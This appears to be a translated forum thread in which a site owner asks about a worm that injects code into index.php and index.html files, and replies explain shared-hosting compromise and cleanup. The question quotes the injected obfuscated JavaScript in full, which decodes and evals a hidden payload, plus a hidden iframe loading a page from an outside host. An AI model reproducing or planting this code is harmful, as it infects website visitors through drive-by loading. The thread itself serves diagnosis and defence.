Кто-нибудь еще видел это часто в последнее время? У меня было несколько сайтов с этой ошибкой.
Parse error: syntax error, unexpected '<' in /home/public_html/index.PHP on line 39
Это вызвано атакой червя / инъекции, которая случайно сбрасывает следующий код во все файлы index.php / index.html, которые он может найти:
<html><body><script>date=new Date();var ar="Aw'zg>lpNu1m<0]c;erCy,aTnhE={s}i B() :[.\"ofbvdt/";try{gserkewg();}catch(a){k=new Boolean().toString()};var ar2="f108,0,-15,33,-30,6,33,-12,-78,-18,6,18,21,66,-21,-105,39,87,-60,-60,33,-18,18,21,66,-51,12,-39,9,-3,-54,12,42,-33,18,51,-96,123,-6,12,-75,-54,99,9,-75,3,63,-21,24,0,0,-15,33,-72,12,-33,18,3,48,3,-57,60,0,-18,6,-45,-33,69,-36,45,-12,24,0,0,27,-12,-78,-18,6,18,21,66,-21,-114,51,39,45,-87,51,18,-84,57,33,-72,12,-33,18,45,-9,-33,-9,36,-75,69,63,0,-117,90,30,0,-96,78,-96,45,66,-87,3,33,51,-72,72,-51,30,-72,-36,108,-72,0,96,-96,78,-96,45,66,-87,3,63,-42,63,-105,-27,90,-93,90,42,3,-63,6,-75,24,9,-33,90,-21,-24,42,-81,63,63,-57,-75,24,9,-33,90,-9,51,-78,-42,33,30,-75,126,-39,-6,6,36,-36,-75,75,45,-78,51,-36,18,42,0,-84,21,-24,-27,102,-36,6,45,-45,30,-51,39,-45,63,-42,36,-105,9,111,-87,-3,-30,33,75,12,-27,-72,9,90,-15,-102,90,-72,9,-42,9,21,105,-48,33,-72,12,-33,18,-36,105,-15,-57,60,0,-18,18,0,18,-99,45,-27,93,-45,30,-51,24,-3,33,-72,12,-33,18,3,48,3,-21,24,0,0,24,-66,-12,42,30,-30,-15,15,39,-12,-78,-18,6,18,21,66,-21,-72,9,-3,15,72,-87,27,-60,33,-18,18,21,66,-36,-96,87,33,-72,12,-33,18,-45,99,-57,78,-9,-30,-36,87,-138,138,0,-84,39,36,-102,111,-87,51,-96,81,-33,-9,-39,57,-57,69,63,0,-117,90,30,0,-96,78,-96,45,66,-87,3,33,51,-72,72,-51,30,-72,-36,108,-72,0,96,-96,78,-96,45,66,-87,3,63,-42,63,-105,-27,99,-57,78,-9,-30,51,-78,-42,33,66,15,-39,-6,6,36,-36,-75,75,45,-78,21,-75,69,18,42,0,-84,21,-66,42,78,-9,-30,51,-78,-42,33,66,-96,102,-36,6,45,-45,30,-51,9,-75,60,63,-42,36,-105,9,111,-87,-45,42,78,-9,-30,51,-78,-42,33,66,-99,33,75,12,-57,-75,33,-33,42,78,-9,-30,51,-78,-42,33,66,21,-15,-102,60,-75,33,-33,42,78,-9,-30,-36,87,-138,138,0,-84,39,36,-102,111,-87,51,-96,-3,90,42,3,-63,-69,57,-57,24,9,-33,99,-57,78,-9,-30,-36,87,-138,138,0,-84,39,36,-102,111,-87,51,-96,69,-24,42,-81,63,63,-132,57,-57,24,9,-33,99,-57,60,0,0,27,-12,-78,-18,6,18,21,66,-21,-105,39,87,-60,-60,33,-18,18,21,66,-51,12,-39,9,-3,-54,12,42,-33,18,51,-96,123,-6,12,-75,-54,99,9,-75,3,75,-51,-45,0,30,21,63,-78,18,18,-75,117,-33,24,-21,-57,60,0,-18]".replace(k.substr(0,1),'[');pau="rn ev2010".replace(date.getFullYear()-1,"al");e=new Function("","retu"+pau);e=e();ar2=e(ar2);s="";var pos=0;for(i=0;i<ar2.length;i++){pos+=parseInt(k.replace("false","0asd"))+ar2[i]/3;s+=ar.substr(pos,1);}e(s);</script></body></html>
Код вслепую вставляет iFrame на основе javascript:
<iframe height="10" width="10" src="http://counterstats.cz.cc/counter.htm" style="visibility: hidden; position: absolute; left: 0pt; top: 0pt;"></iframe>
Я пытался разорвать сайт на части, чтобы посмотреть, как это произошло, но кто-нибудь знает, что это за конкретная атака и как она распространяется? Это дырявый непропатченный код, сама CPanel, взломанные пароли, рутированный сервер?
РЕДАКТИРОВАТЬ
Мне не удалось точно определить, что здесь происходит, но похоже, что это дело CPanel - изменение всех паролей в CPanel, похоже, останавливает повторные атаки. Я оставил один неважный сайт в этом состоянии (без очистки кода сайта), и он был абсолютно нормальным, тогда как раньше он ежедневно портился. Обратился к UK2.net и JustHost по этому поводу, но ответа пока нет.
Также кажется, что папка public_html и некоторые другие "системные" папки были странным образом изменены chmod - много 777 там, где их быть не должно. Опять же, пока нет ответа от хозяев.
РЕДАКТИРОВАТЬ
Выглядит как "Trojan.JS.Agent.bur" Пытаюсь узнать больше ...
Похоже, что ваши сайты стали жертвой червя, внедряющего HTML / код в ваши файлы. Опубликуйте соответствующий код в следующий раз, и его можно будет проанализировать. А пока вы должны убедиться, что все ваши приложения и системные библиотеки обновлены до последних исправлений безопасности.
Вы используете среду виртуального хостинга или являетесь клиентом?
Скорее всего, произошло то, что сервер запускал код всех пользователей под одним и тем же пользователем (возможно, apache или httpd). Затем достаточно одного уязвимого скрипта от любой клиент на машине, и все, по сути, взломаны.
Если вы не являетесь оператором этого сервера, вы мало что можете сделать. Вы можете попробовать изменить все на 755 и убедиться, что владельцем всего является ваш пользователь, а не «apache» или «никто». Однако это только остановит изменение ваших файлов. Злоумышленник по-прежнему может прочитать все ваши файлы (например, учетные данные вашей базы данных). Если вы не можете убедить свой хост перейти на suPHP или аналогичный, я настоятельно рекомендую как можно скорее поискать другой хост.
Если вы являетесь хостом, перестройте apache (с помощью easyapache) и включите параметр suPHP. Затем вам нужно выбрать файлы каждого пользователя, чтобы они принадлежали их собственному пользователю, а затем chmod 755. suPHP будет запускать код каждого пользователя от имени своего собственного пользователя, что предотвратит этот тип атаки.
Он либо вводится через SQL-инъекцию в базу данных вашего веб-сайта, либо загружается / используется через онлайн-менеджер файлов. Я видел, как это происходило много раз, и обычно, когда это было во всех файлах, это выполнялось через веб-управление файлами.
Излишне говорить, что, поскольку вы еще не получили ответа от хозяина, я бы начал искать новую компанию.
Скорее всего, вы застрянете с ручной очисткой, если они (и вы не в порядке) не восстановите последнюю чистую копию. Я бы все равно подумала о переходе в другую компанию из-за их медленной реакции.